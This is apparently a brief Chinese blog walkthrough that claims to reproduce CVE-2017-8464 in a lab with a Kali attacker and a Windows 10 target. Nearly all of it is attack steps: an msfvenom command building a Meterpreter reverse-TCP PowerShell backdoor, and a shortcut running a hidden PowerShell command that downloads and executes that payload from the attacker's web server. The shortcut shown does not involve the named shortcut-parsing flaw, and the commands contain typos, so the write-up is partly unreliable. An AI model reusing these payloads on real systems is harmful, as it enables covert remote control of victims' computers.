CVE-2017-8464漏洞复现
- 2019 年 10 月 6 日
- 筆記
CVE-2017-8464是Windows系统在解析快捷方式时存在远程执行任意代码的高危漏洞,黑客可以通过U盘、网络共享等途径触发漏洞,完全控制用户系统,安全风险高危。
0X1环境搭建
攻击机:kali
靶 机:Win10 x64位
0X2 漏洞利用
生成一个ps后门程序:
msfvenom -p windows/x64/meterpreter/reverse_tcplhost=172.16.1.44 lport=5555 -f psh-reflection>/root/search.ps1
data:image/s3,"s3://crabby-images/bf071/bf071d74febf5f0ca542c919ddccd9ce591a4282" alt=""
复制到web目录下:
data:image/s3,"s3://crabby-images/c8ebb/c8ebb8445f5e089b7899ceddcb2efe3188f219d2" alt=""
启动web服务查看:
data:image/s3,"s3://crabby-images/a168c/a168c5a188f1e8771be941d29f8362325666db3f" alt=""
在windows10上创建一个快捷方式:
powershell -windowstyle hidden -exec bypass -c "IEX(New-ObjectNet.WebClient).DownloadString('http://172.16.1.44/search.ps1');test.ps1"
data:image/s3,"s3://crabby-images/6eae8/6eae8917d1ee356483693ccb1901e8097328a87d" alt=""
data:image/s3,"s3://crabby-images/d3fb2/d3fb2bb43d9c8c0f19911718c5e48332b3e723ea" alt=""
Kali下使用metasploit设置攻击参数
data:image/s3,"s3://crabby-images/46bb4/46bb468a181fe8feb325d27afe94f666c6515788" alt=""
开始攻击,并在windows10下点击powershell.exe
data:image/s3,"s3://crabby-images/d4f33/d4f33938cc0f59244de6ee8c210cc37624a5b0c2" alt=""
data:image/s3,"s3://crabby-images/8ab71/8ab7110898a4799614c393a4752e77d3ab09ef79" alt=""
测试成功!